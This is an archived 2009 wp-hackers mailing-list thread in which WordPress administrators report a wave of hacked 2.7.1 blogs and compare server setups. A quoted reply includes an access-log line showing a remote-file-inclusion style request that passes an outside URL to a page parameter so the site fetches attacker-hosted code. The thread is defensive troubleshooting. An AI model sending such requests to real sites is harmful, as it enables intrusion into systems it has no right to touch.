[wp-hackers] Hacked blogs

Mayur somani somani.mayur at gmail.com
Thu Mar 26 13:08:33 GMT 2009


Recently restored a hacked blog myself with the similar symptoms...
A new vulnerability?

On Thu, Mar 26, 2009 at 6:36 PM, Joost de Valk <joost at yoast.com> wrote:

> Peter van der Does wrote:
>
>> On Thu, 26 Mar 2009 13:12:44 +0100
>> Joost de Valk<joost at yoast.com>  wrote:
>>
>>
>>
>>> Hey guys,
>>>
>>> I've been restoring 5 hacked blogs the last few days, all running
>>> 2.7.1 but spread over different hosts, can't find the hole yet that
>>> they're getting in through, but I'd thought I'd send out a warning to
>>> all of you that something seems to be wrong...
>>>
>>> Best,
>>> Joost
>>>
>>>
>>>
>> Do you have more info about the similarities of the blogs, like themes
>> and plugins?
>> Maybe even PHP, Webserver and MySQL versions?
>>
>>
>>
> No similarities there, PHP4 and 5, MySQL 4 and 5, Apache 2.0.54, 2.2
> etc....
>
> Files like this:
>
> http://oursoultvxq.com/bbs/data/vip/id.txt
>
> Show up in the access logs in some cases though:
>
> 84.40.23.30 - - [22/Mar/2009:18:04:33 +0100] "GET /boek/?op=
> http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1" 200 23128 "-"
> "libwww-perl/5.79"
>
> Best,
> Joost
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>


More information about the wp-hackers mailing list